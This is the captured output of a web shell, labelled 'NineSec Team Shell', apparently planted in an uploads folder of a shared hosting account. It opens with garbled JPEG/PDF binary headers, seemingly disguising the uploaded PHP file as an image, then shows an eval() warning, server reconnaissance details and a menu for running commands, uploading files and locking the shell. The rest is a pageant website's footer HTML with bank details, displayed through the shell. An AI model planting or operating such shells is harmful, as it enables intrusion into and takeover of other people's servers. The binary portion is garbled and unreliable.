JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 C  %PDF-1.3 % 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream x\mo7 a?Hyi{$E(i?ckrAvEzFHI|H?{|Z|X|Ň77?Oݞ__lOя77wx'?Ű8I] gQB2za]l|ɇ՟?} " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress
Warning: file_get_contents(test.txt): Failed to open stream: No such file or directory in /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/1770357389_0_197006009.php(44) : eval()'d code on line 6
NineSec Team Shell
NineSec Team Shell
Server IP : 82.25.113.252  /  Your IP : 216.73.216.172
Web Server : LiteSpeed
System : Linux fr-int-web2058.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u178500310 ( 178500310)
PHP Version : 8.2.29
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u178500310/domains/pinkrosesentertainment.com/public_html/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/u178500310/domains/pinkrosesentertainment.com/public_html/footercrhck.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

    <style>
/* Footer-specific styles - scoped to #custom-footer only */
#custom-footer {
  background: black;
  color: #f0f0f0;
  font-family: 'Poppins', sans-serif;
  padding: 80px 20px 30px;
  position: relative;
  overflow: hidden;
  box-shadow: 0 -10px 30px rgba(0,0,0,0.3);
}

#custom-footer::before {
  content: '';
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 4px;
  background: linear-gradient(90deg, #ff8a00 0%, #e52e71 50%, #ff8a00 100%);
  animation: gradientBG 15s ease infinite;
  background-size: 400% 400%;
}

.custom-footer-container {
  max-width: 1200px;
  margin: 0 auto;
  position: relative;
  z-index: 1;
}

.custom-footer-grid {
  display: grid;
  grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));
  gap: 40px;
}

.custom-footer-col {
  position: relative;
  padding-top: 50px; /* Space for absolute positioned h4 */
}

.custom-footer-col h4 {
  color: #fff;
  margin: 0;
  font-weight: 600;
  font-size: 18px;
  position: absolute;
  top: 0;
  left: 0;
  padding-bottom: 10px;
}

.custom-footer-col h4::after {
  content: '';
  position: absolute;
  left: 0;
  bottom: 0;
  width: 50px;
  height: 2px;
  background: linear-gradient(90deg, #ff8a00, #e52e71);
}

.custom-footer-col p,
.custom-footer-col li,
.custom-footer-col a {
  color: #ddd;
  font-size: 15px;
  line-height: 1.8;
  text-decoration: none;
  transition: all 0.3s ease;
}

.custom-footer-col p {
  margin: 0 0 15px 0;
  text-align: left;
}

.custom-footer-col ul {
  list-style: none;
  padding: 0;
  margin: 0;
}

.custom-footer-col ul li {
  margin-bottom: 12px;
  display: flex;
  align-items: flex-start;
}

.custom-footer-col ul li i {
  margin-right: 10px;
  color: #ff8a00;
  min-width: 20px;
  text-align: center;
  font-size: 16px;
  margin-top: 3px; /* Better icon alignment */
}

.custom-footer-col a:hover {
  color: #fff;
  padding-left: 5px;
  text-shadow: 0 0 5px rgba(255,255,255,0.3);
}

.footer-logo {
  max-width: 180px;
  margin-bottom: 20px;
  transition: all 0.3s ease;
  display: block;
}

.footer-logo:hover {
  transform: scale(1.05);
}

.social-icons {
  margin-top: 20px;
  display: flex;
  gap: 15px;
  flex-wrap: wrap;
}

.social-icons a {
  display: inline-flex;
  align-items: center;
  justify-content: center;
  width: 40px;
  height: 40px;
  background: rgba(255, 255, 255, 0.1);
  backdrop-filter: blur(5px);
  color: #fff;
  font-size: 18px;
  border-radius: 50%;
  transition: all 0.3s ease;
  box-shadow: 0 4px 6px rgba(0,0,0,0.1);
}

.social-icons a:hover {
  background: linear-gradient(45deg, #ff8a00, #e52e71);
  color: #fff;
  transform: translateY(-5px);
  box-shadow: 0 6px 12px rgba(0,0,0,0.2);
}

.custom-footer-bottom {
  padding-top: 30px;
  margin-top: 50px;
  text-align: center;
  font-size: 14px;
  position: relative;
}

.custom-footer-bottom::before {
  content: '';
  position: absolute;
  top: 0;
  left: 50%;
  transform: translateX(-50%);
  width: 200px;
  height: 1px;
  background: linear-gradient(90deg, transparent, rgba(255,255,255,0.3), transparent);
}

.custom-footer-bottom p {
  margin: 0;
  color: #aaa;
  letter-spacing: 0.5px;
}

.custom-footer-bottom a {
  color: #ff8a00;
  text-decoration: none;
  font-weight: 500;
  transition: all 0.3s ease;
}

.custom-footer-bottom a:hover {
  color: #e52e71;
  text-decoration: none;
}

/* Animations */
@keyframes float {
  0% { transform: translateY(0px); }
  50% { transform: translateY(-10px); }
  100% { transform: translateY(0px); }
}

@keyframes gradientBG {
  0% { background-position: 0% 50%; }
  50% { background-position: 100% 50%; }
  100% { background-position: 0% 50%; }
}

#custom-footer::after {
  content: '';
  position: absolute;
  bottom: -50px;
  right: -50px;
  width: 200px;
  height: 200px;
  background: radial-gradient(circle, rgba(255,138,0,0.1) 0%, rgba(229,46,113,0) 70%);
  animation: float 6s ease-in-out infinite;
  z-index: 0;
}

/* Adding a second floating element */
#custom-footer::before {
  content: '';
  position: absolute;
  top: 20%;
  left: -50px;
  width: 200px;
  height: 200px;
  background: radial-gradient(circle, rgba(229,46,113,0.1) 0%, rgba(229,46,113,0) 70%);
  animation: float 8s ease-in-out infinite 2s;
  z-index: 0;
}

/* Responsive adjustments */
@media (max-width: 768px) {
  .custom-footer-grid {
    grid-template-columns: 1fr;
    gap: 50px;
  }
  
  .custom-footer-col {
    text-align: center;
    padding-top: 60px;
  }
  
  .custom-footer-col h4 {
    left: 50%;
    transform: translateX(-50%);
    width: 100%;
    text-align: center;
  }
  
  .custom-footer-col h4::after {
    left: 50%;
    transform: translateX(-50%);
  }
  
  .social-icons {
    justify-content: center;
  }
  
  .custom-footer-col ul li {
    justify-content: center;
  }
  
  .custom-footer-col p {
    text-align: center;
  }
}
</style>
</head>
<body>
    <footer id="custom-footer">
  <div class="custom-footer-container">
    <div class="custom-footer-grid">
      <!-- About Section -->
      <div class="custom-footer-col">
        <img src="assets/images/logoO/pinkNW.png" alt="Tiska Logo" class="footer-logo">
        <h4>About</h4>
        <p>Welcome to India's most dignified woman beauty pageant. Tiska Miss & Mrs. India is not just a conventional beauty contest, but a celebration of grace, poise, confidence, and talent.</p>
      </div>

      <!-- Quick Links -->
      <div class="custom-footer-col">
        <h4>Quick Links</h4>
        <ul>
          <li><i class="fa fa-angle-right"></i><a href="index.html">Home</a></li>
          <li><i class="fa fa-angle-right"></i><a href="contact-us.html">Contact Us</a></li>
          <li><i class="fa fa-angle-right"></i><a href="faq.html">FAQ</a></li>
          <li><i class="fa fa-angle-right"></i><a data-toggle="modal" data-target="#myModal">Registrations</a></li>
          <li><i class="fa fa-angle-right"></i><a href="team.html">Team</a></li>
          <li><i class="fa fa-angle-right"></i><a href="policy.html">Privacy Policy</a></li>
          <li><i class="fa fa-angle-right"></i><a href="terms.html">Terms & Conditions</a></li>
        </ul>
        <div class="social-icons">
          <a href="https://www.facebook.com/tiskamissmrsmrindia/" target="_blank"><i class="fa fa-facebook"></i></a>
          <a href="mailto:info@missindiamillion.com" target="_blank"><i class="fa fa-envelope"></i></a>
          <a href="https://instagram.com/tiskamissmrsindia" target="_blank"><i class="fa fa-instagram"></i></a>
          <a href="#"><i class="fa fa-youtube"></i></a>
        </div>
      </div>

      <!-- Contact -->
      <div class="custom-footer-col">
        <h4>Contact Us</h4>
        <ul>
          <li><i class="fa fa-envelope"></i> <a href="mailto:info@tiskaexpo.com">info@tiskaexpo.com</a></li>
          <li><i class="fa fa-phone"></i> <a href="tel:+917991489999">+91-7991489999</a></li>
          <li><i class="fa fa-mobile"></i> <a href="tel:+919599432256">+91-9599432256</a></li>
          <li><i class="fa fa-map-marker"></i> H-2 Building, Netaji Subhash Place, Pitampura, New Delhi - 110034</li>
        </ul>
      </div>

      <!-- Bank Details -->
      <div class="custom-footer-col">
        <h4>Bank Details</h4>
        <ul>
          <li><i class="fa fa-university"></i> <strong>Account Name:</strong> Tiska Pageants</li>
          <li><i class="fa fa-bank"></i> <strong>Bank:</strong> Axis Bank Ltd</li>
          <li><i class="fa fa-credit-card"></i> <strong>A/C No:</strong> 920020013396748</li>
          <li><i class="fa fa-file-text"></i> <strong>Type:</strong> Current Account</li>
          <li><i class="fa fa-university"></i>
<strong>IFSC:</strong> UTIB0003229</li>
          <li><i class="fa fa-university"></i> <strong>Branch:</strong>B Block Indira ,Nagar Lucknow</li>
          <li><i class="fa fa-mobile"></i> <strong>UPI:</strong> 7991489999</li>
        </ul>
      </div>
    </div>

    <!-- Footer Bottom -->
    <div class="custom-footer-bottom">
      <p>&copy; 2020 tiskapageants.com | Designed by <a href="https://alwaysdial.com/">Always Dial</a></p>
    </div>
  </div>
</footer>
</body>
</html>

NineSec Team - 2022